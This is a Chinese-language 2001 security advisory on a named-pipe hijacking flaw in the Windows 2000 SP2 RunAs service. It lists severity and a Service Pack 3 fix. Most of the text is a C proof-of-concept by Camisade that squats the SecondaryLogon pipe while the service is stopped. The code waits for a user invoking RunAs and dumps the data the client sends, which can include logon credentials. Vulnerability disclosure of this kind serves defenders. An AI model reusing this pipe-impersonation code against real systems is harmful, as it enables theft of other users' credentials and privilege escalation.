Windows 2000 RunAs 服务存在有名管道被劫持漏洞发布时间:2001-11-13 更新时间:2001-11-13 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式 受影响系统 Microsoft Windows 2000 SP2详细描述 Windows 2000 RunAs 服务允许应用程序或者服务以不同用户执行,它通过按住shift键并右键点击图标,然后选择'Run as..'访问。 当RunAs服务被调用的时候,它可以为客户端建立有名管道来进行信任通信。 如果RunAs服务停止,当另一个用户尝试使用'RunAs'攻击者可以建立同样名字的有名管道来进行信任通信。 测试代码 // radix1112200101.c - Camisade - Team RADIX - 11-12-2001 // // Camisade (www.camisade.com) is not responsible for the use or // misuse of this proof of concept source code. #define WIN32_LEAN_AND_MEAN #define UNICODE #define _UNICODE #include <windows.h> #include <tchar.h> #include <stdio.h> #define MAX_IN_BUF 0x1000 #define MAX_OUT_BUF 0x4 #define MAX_INST 0xA #define SECONDARY_LOGON_PIPE _T("\\\\.\\pipe\\SecondaryLogon") void main() { HANDLE hPipe; hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF, NMPWAIT_USE_DEFAULT_WAIT, 0); if (hPipe == INVALID_HANDLE_VALUE) { printf("Can't create secondary logon pipe. Error %d\n", GetLastError()); return; } printf("Created pipe and waiting for clients...\n"); if (ConnectNamedPipe(hPipe, 0)) { UCHAR InBuf[MAX_IN_BUF]; DWORD dwReadCount; while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0)) { printf("Read %d bytes. (ASCII Dump)\n", dwReadCount); DWORD dwPos; for (dwPos = 0; dwPos < dwReadCount; dwPos++) { printf("%c ", InBuf[dwPos]); if ((dwPos % 16) == 0) printf("\n"); } DWORD dwReply = ERROR_ACCESS_DENIED; DWORD dwWroteCount; WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0); } } DisconnectNamedPipe(hPipe); CloseHandle(hPipe); } 解决方案 此补丁将在Service Pack3上修补。 相关信息 参考:http://www.camisade.com/research/reports/radix1112200101.html |
